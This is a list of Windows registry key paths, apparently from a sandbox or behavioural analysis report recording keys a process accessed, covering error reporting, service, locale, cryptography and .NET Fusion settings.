HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-18\ProfileImagePath
HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_USERS\.DEFAULT\Environment
HKEY_USERS\.DEFAULT\Volatile Environment
HKEY_USERS\.DEFAULT\Volatile Environment\0
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\WOW64
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\RequiredPrivileges
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Environment
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\VaultSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\gpsvc\ObjectName
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\ImagePath
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\Type
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\Start
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\ErrorControl
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\Tag
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\DependOnService
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\DependOnGroup
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\Group
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\CryptSvc\ObjectName
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Svchost
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\WerSvcGroup
HKEY_USERS\.DEFAULT\Control Panel\International
HKEY_USERS\.DEFAULT\Control Panel\International\LocaleName
HKEY_USERS\.DEFAULT\Control Panel\International\sCountry
HKEY_USERS\.DEFAULT\Control Panel\International\sList
HKEY_USERS\.DEFAULT\Control Panel\International\sDecimal
HKEY_USERS\.DEFAULT\Control Panel\International\sThousand
HKEY_USERS\.DEFAULT\Control Panel\International\sGrouping
HKEY_USERS\.DEFAULT\Control Panel\International\sNativeDigits
HKEY_USERS\.DEFAULT\Control Panel\International\sCurrency
HKEY_USERS\.DEFAULT\Control Panel\International\sMonDecimalSep
HKEY_USERS\.DEFAULT\Control Panel\International\sMonThousandSep
HKEY_USERS\.DEFAULT\Control Panel\International\sMonGrouping
HKEY_USERS\.DEFAULT\Control Panel\International\sPositiveSign
HKEY_USERS\.DEFAULT\Control Panel\International\sNegativeSign
HKEY_USERS\.DEFAULT\Control Panel\International\sTimeFormat
HKEY_USERS\.DEFAULT\Control Panel\International\sShortTime
HKEY_USERS\.DEFAULT\Control Panel\International\s1159
HKEY_USERS\.DEFAULT\Control Panel\International\s2359
HKEY_USERS\.DEFAULT\Control Panel\International\sShortDate
HKEY_USERS\.DEFAULT\Control Panel\International\sYearMonth
HKEY_USERS\.DEFAULT\Control Panel\International\sLongDate
HKEY_USERS\.DEFAULT\Control Panel\International\iCountry
HKEY_USERS\.DEFAULT\Control Panel\International\iMeasure
HKEY_USERS\.DEFAULT\Control Panel\International\iPaperSize
HKEY_USERS\.DEFAULT\Control Panel\International\iDigits
HKEY_USERS\.DEFAULT\Control Panel\International\iLZero
HKEY_USERS\.DEFAULT\Control Panel\International\iNegNumber
HKEY_USERS\.DEFAULT\Control Panel\International\NumShape
HKEY_USERS\.DEFAULT\Control Panel\International\iCurrDigits
HKEY_USERS\.DEFAULT\Control Panel\International\iCurrency
HKEY_USERS\.DEFAULT\Control Panel\International\iNegCurr
HKEY_USERS\.DEFAULT\Control Panel\International\iCalendarType
HKEY_USERS\.DEFAULT\Control Panel\International\iFirstDayOfWeek
HKEY_USERS\.DEFAULT\Control Panel\International\iFirstWeekOfYear
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\wersvc
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Parameters
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Parameters\ServiceDll
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Parameters\ServiceManifest
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Parameters\ServiceMain
HKEY_LOCAL_MACHINE
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\ServiceTimeout
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\WerSvc\Parameters\ServiceDllUnloadOnStop
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\NoReflection
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\Category
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\ParentFolder
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\Description
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\RelativePath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\ParsingName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\InfoTip
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\LocalizedName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\Icon
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\Security
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\StreamResource
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\StreamResourceType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\LocalRedirectOnly
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\Roamable
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\PreCreate
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\Stream
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\PublishExpandedPath
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\Attributes
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\FolderTypeID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\InitFolderHandler
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\FolderDescriptions\{62AB5D82-FDC1-4DC3-A9DD-070D1D495D97}\PropertyBag
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProfileList\S-1-5-21-1822907384-1282624486-319450072-1000\ProfileImagePath
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\AppData
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders\Local AppData
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Environment
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Volatile Environment
HKEY_USERS\S-1-5-21-1822907384-1282624486-319450072-1000\Volatile Environment\0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\TraceFlags
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\NoReflection
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\AeDebug
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\AeDebug\Debugger
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Plugins\AppRecorder
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Plugins\FDR\CurrentSession
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\Debug\ExceptionRecord
HKEY_CURRENT_USER\Software\Microsoft\Windiff
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\CurrentType
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Windows Error Reporting\Consent\APPCRASH
HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting\Consent\APPCRASH
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\6FD5A890
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\LocalDumps
HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\SystemCertificates\ChainEngine\Config
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\OID\EncodingType 0\CertDllCreateCertificateChainEngine\Config\EnableInetUnknownAuth
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Class\{4d36e972-e325-11ce-bfc1-08002be10318}
HKEY_CURRENT_USER\Software\Microsoft\windows\CurrentVersion\Internet Settings\Wpad
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Windows Error Reporting\Escalation
HKEY_LOCAL_MACHINE\Software\Microsoft\SQMClient\Windows\WMR
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SQMClient\Windows\DisabledProcesses\F8B50CC5
HKEY_LOCAL_MACHINE\Software\Microsoft\Cryptography\OID
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 0\CertDllVerifyCertificateChainPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 1
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\OID\EncodingType 1\CertDllVerifyCertificateChainPolicy
HKEY_LOCAL_MACHINE\SOFTWARE\Macromedia\FlashPlayerSAU
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Macromedia\FlashPlayerSAU\LastUpdateCheck
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Macromedia\FlashPlayerSAU\CheckFrequency

Read Keys

HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\InstallRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\CLRLoadLogDir
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\UseLegacyV2RuntimeActivationPolicyDefaultValue
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\OnlyUseLatestCLR
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\NET Framework Setup\NDP\v4\Full\Release
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\DisableConfigCache
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\CacheLocation
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DownloadCacheQuotaInKB
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\EnableLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LoggingLevel
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\ForceLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogFailures
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\LogResourceBinds
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseRetryAttempts
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\FileInUseMillisecondsBetweenRetries
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\UseLegacyIdentityFormat
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\DisableMSIPeek
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DevOverrideEnable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NGen\Policy\v4.0\OptimizeUsedBinaries
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AltJit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\Latest
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\index23
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\PublisherPolicy\Default\LegacyPolicyTimeStamp
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Locale\00000410
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\Language Groups\1
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Cryptography\Defaults\Provider Types\Type 024\Name
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\Windows Error Reporting\WMR\Disable
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\FORCE_ASSEMREF_DUPCHECK
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\NicPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\RegistryRoot
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\AssemblyPath2
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\SideBySide\PreferExternalManifest
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStart
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\.NETFramework\GCStressStartAtJit
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\VersioningLog
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NoClientChecks
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\LatestIndex
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\NIUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\index126\ILUsageMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\181938c6\7950e2c5\83\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\7950e2c5\183e33de\83\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\GACChangeNotification\Default\mscorlib,2.0.0.0,,b77a5c561934e089,x86
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ConfigString
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MVID
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\EvalationData
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\ILDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\NIDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\NI\1c22df2f\4f99a7c9\2e\MissingDependencies
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\c991064\2bd33e1c\79\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\6dc7d4c0\a5cd4db\7e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\3ced59c5\1b2590b1\7c\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\f6e8397\46ad0879\6f\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\2b1a4e4\38a3212c\44\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\SIG
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\24bf93f6\455bab30\6e\LastModTime
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\DisplayName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Status
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\Modules
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Fusion\NativeImagesIndex\v2.0.50727_32\IL\4f99a7c9\53bea2b0\2e\SIG
